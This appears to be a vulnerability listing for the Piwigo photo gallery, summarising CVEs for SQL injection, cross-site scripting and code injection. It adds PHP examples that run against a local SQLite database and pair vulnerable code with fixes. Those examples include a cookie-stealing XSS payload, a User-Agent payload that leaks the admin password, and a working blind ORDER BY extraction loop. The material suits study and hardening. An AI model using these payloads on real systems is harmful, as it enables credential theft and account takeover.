
CVSS: 6.4 | EPSS: 0% | CPEs: 1 | EXPL: 3

29 Jul 2025 — Piwigo 13.8.0 and below is vulnerable to SQL injection in the parameters max_level and min_register. These parameters are consumed by the ws_user_gerList function in include/ws_functions/pwg.users.php; that function is invoked through ws.php and backs the advanced user search in /admin.php?page=user_list. • https://github.com/Piwigo/Piwigo/issues/2197 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVSS: 9.3 | EPSS: 4% | CPEs: 4 | EXPL: 1

09 Oct 2023 — Piwigo is an open source photo gallery application. Prior to version 14.0.0beta4, a reflected cross-site scripting (XSS) vulnerability exists in the `/admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=[here]` page. An attacker can use it to inject HTML and JavaScript into the page, which is then executed in the browser of an admin user who visits a URL carrying the payload. The vulnerability is caused by the insecure injection of the `plugin_id` value from the URL into th... • https://github.com/Piwigo/Piwigo/commit/cc99c0f1e967c5f1722a0cce30ff42374a7bbc23 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) •
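The reflected XSS above comes down to echoing a query-string value into admin markup unencoded. The following is an added, illustrative pair of render functions (not Piwigo's own code; the HTML fragment and the function names are assumptions) showing the vulnerable pattern beside a hardened one that allowlists the identifier format and applies contextual output encoding:

```php
<?php
// Added example, not Piwigo's code. The page and parameter name mirror the
// advisory above; the HTML fragment and the helper names are assumptions.
declare(strict_types=1);

// Vulnerable: the raw query-string value is spliced straight into the markup,
// so a crafted plugin_id closes the text node and injects a tag.
function renderInstallStatusVulnerable(string $pluginId): string
{
    return '<div class="infos">Plugin ' . $pluginId . ' installed.</div>';
}

// Hardened: plugin ids are directory names, so a strict format allowlist is
// appropriate; output encoding is applied anyway so that a value which slips
// past the allowlist still cannot break out of the text context.
function renderInstallStatusSafe(string $pluginId): string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $pluginId)) {
        return '<div class="errors">Invalid plugin id.</div>';
    }
    $safe = htmlspecialchars($pluginId, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="infos">Plugin ' . $safe . ' installed.</div>';
}

// Constructed payload of the kind an attacker would place in the plugin_id
// parameter of a link sent to an administrator (reflected XSS needs no
// stored state, only a victim with an admin session who opens the link).
$payload = '<img src=x onerror=alert(document.cookie)>';

echo renderInstallStatusVulnerable($payload), "\n";
echo renderInstallStatusSafe($payload), "\n";
echo renderInstallStatusSafe('some-plugin_name'), "\n";
```

Running the script shows the first line carrying a live `<img onerror>` tag, the second rejected by the allowlist, and the third rendered unchanged because a well-formed id needs no escaping. Encoding alone (without the allowlist) would also neutralise the payload; keeping both gives defence in depth for a value that is never meant to contain markup.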

CVSS: 9.0 | EPSS: 64% | CPEs: 1 | EXPL: 1

07 Jul 2023 — Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL injection vulnerability in the login of the administrator screen. The SQL statement that stores the HTTP `User-Agent` header, at the endpoint that records user information on login to the administrator screen, is vulnerable, and arbitrary SQL statements can be executed. An attacker must be logged in to the administrator screen to exploit it, but low privileges are sufficient. • https://github.com/Piwigo/Piwigo/blob/c01ec38bc43f09424a8d404719c35f963d63cf00/include/dblayer/functions_mysqli.inc.php#L491 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVSS: 4.3 | EPSS: 0% | CPEs: 1 | EXPL: 1

15 Jun 2023 — Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function. • https://github.com/Piwigo/Piwigo/issues/1924 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVSS: 9.0 | EPSS: 0% | CPEs: 1 | EXPL: 1

17 May 2023 — Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php. • https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
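Two of the entries above (the `User-Agent` header written into the login record, and the `order[0][dir]` sort direction in user_list_backend.php) are instances of the same defect: request data concatenated into SQL text. The following is an added, self-contained example, not Piwigo's code; it uses an in-memory SQLite database through PDO so it runs offline, and the table layout, rows and parameter handling are constructed to mirror those two cases. It shows each vulnerable pattern beside its fix, plus a boolean-based blind extraction through the ORDER BY case, since a sort direction cannot be bound as a parameter and must be allowlisted instead:

```php
<?php
// Added, illustrative example; not Piwigo's code. In-memory SQLite via PDO so it
// runs offline (php example.php). Table layout, rows and the two request
// parameters (the User-Agent header and order[0][dir]) are constructed to mirror
// the advisories above; column names are assumptions.
declare(strict_types=1);

function makeDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, level INTEGER)');
    $db->exec("INSERT INTO users VALUES (1,'admin','s3cr3t',1), (2,'alice','pw-a',1), (3,'bob','pw-b',1)");
    $db->exec('CREATE TABLE sessions (id INTEGER PRIMARY KEY, user_id INTEGER, user_agent TEXT)');
    return $db;
}

/* Case 1: a header value concatenated into an INSERT (the User-Agent case). */

function recordLoginVulnerable(PDO $db, int $userId, string $ua): void
{
    // The header is trusted as if it were a string literal.
    $db->exec("INSERT INTO sessions (user_id, user_agent) VALUES ($userId, '$ua')");
}

function recordLoginSafe(PDO $db, int $userId, string $ua): void
{
    // Bound parameter: whatever the header contains can only ever be data.
    $stmt = $db->prepare('INSERT INTO sessions (user_id, user_agent) VALUES (:uid, :ua)');
    $stmt->execute([':uid' => $userId, ':ua' => $ua]);
}

/* Case 2: a sort direction concatenated into ORDER BY (the order[0][dir] case). */

function listUsersVulnerable(PDO $db, string $dir): array
{
    return $db->query("SELECT username FROM users ORDER BY level $dir")
              ->fetchAll(PDO::FETCH_COLUMN);
}

function listUsersSafe(PDO $db, string $dir): array
{
    // ORDER BY cannot be parameterised, so map the input onto a fixed allowlist
    // and never let the original string reach the query text.
    $dir = strtoupper($dir) === 'DESC' ? 'DESC' : 'ASC';
    return $db->query("SELECT username FROM users ORDER BY level $dir")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Boolean-based blind extraction through the vulnerable ORDER BY: every user has
// the same level, so the injected CASE expression decides the tie-break order and
// the position of 'admin' in the result leaks one bit per request.
function leakAdminPassword(PDO $db, int $maxLen = 16): string
{
    $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789-';
    $found = '';
    for ($pos = 1; $pos <= $maxLen; $pos++) {
        $hit = false;
        foreach (str_split($alphabet) as $ch) {
            $dir = "ASC, (CASE WHEN (SELECT substr(password,$pos,1) FROM users"
                 . " WHERE username='admin')='$ch' THEN id ELSE -id END)";
            if (listUsersVulnerable($db, $dir)[0] === 'admin') {
                $found .= $ch;
                $hit = true;
                break;
            }
        }
        if (!$hit) {
            break; // no character matched: end of the string
        }
    }
    return $found;
}

$db = makeDb();

// Payload for case 1: no stacked query needed; it splices a subquery into the
// literal with SQLite's || operator (CONCAT() on MySQL), so the stored user agent
// carries the admin password out of the users table into an audit row.
$ua = "Mozilla/5.0' || (SELECT password FROM users WHERE username='admin') || '";
recordLoginVulnerable($db, 2, $ua);
recordLoginSafe($db, 2, $ua);
foreach ($db->query('SELECT user_agent FROM sessions ORDER BY id') as $row) {
    echo $row['user_agent'], "\n";   // leaked value first, inert payload second
}

echo leakAdminPassword($db), "\n";                                   // case 2, vulnerable
echo implode(',', listUsersSafe($db, 'ASC, (SELECT 1)')), "\n";       // case 2, allowlisted
```

The first session row shows the admin password appended to the user agent, the second stores the payload verbatim as harmless text. The blind loop recovers the password one character per matching request, which is the practical reading of "arbitrary SQL statements can be executed" for an ORDER BY sink: no result column is needed when row order itself is the oracle. Note that the allowlisted version also drops the attacker-controlled string entirely rather than trying to escape it, since escaping does not apply to identifiers and keywords.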

CVSS: 9.0 | EPSS: 37% | CPEs: 1 | EXPL: 3

21 Apr 2023 — A SQL injection vulnerability in Piwigo v13.5.0 and before allows a remote attacker to execute arbitrary SQL via the filter_user_id parameter of the admin.php?page=history&filter_image_id=&filter_user_id endpoint. Piwigo version 13.5.0 suffers from a remote SQL injection vulnerability. • https://packetstorm.news/files/id/172059 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVSS: 7.5 | EPSS: 0% | CPEs: 1 | EXPL: 1

14 Jul 2022 — Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via the Search function. • https://github.com/sth276/research/blob/main/piwigo_vul/Second-Order%20SQL%20Injection%20Vulnerabilities%20in%20Piwigo.md • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVSS: 8.8 | EPSS: 2% | CPEs: 1 | EXPL: 1

28 Jun 2022 — Piwigo 11.5.0 is affected by a remote code execution (RCE) vulnerability in the LocalFiles Editor. • https://github.com/Yang9999999/vuln/blob/main/README.md • CWE-94: Improper Control of Generation of Code ('Code Injection') •

CVSS: 5.4 | EPSS: 0% | CPEs: 1 | EXPL: 1

14 Jun 2022 — In Piwigo 11.5.0, there is a persistent cross-site scripting vulnerability in the single mode function of the batch manager, reached through /admin.php?page=batch_manager&mode=unit. • https://github.com/Piwigo/Piwigo/issues/1476 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVSS: 8.8 | EPSS: 0% | CPEs: 1 | EXPL: 1

26 May 2022 — Piwigo 11.5.0 is affected by a SQL injection vulnerability via admin.php and the id parameter. • https://github.com/Piwigo/Piwigo/issues/1470 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •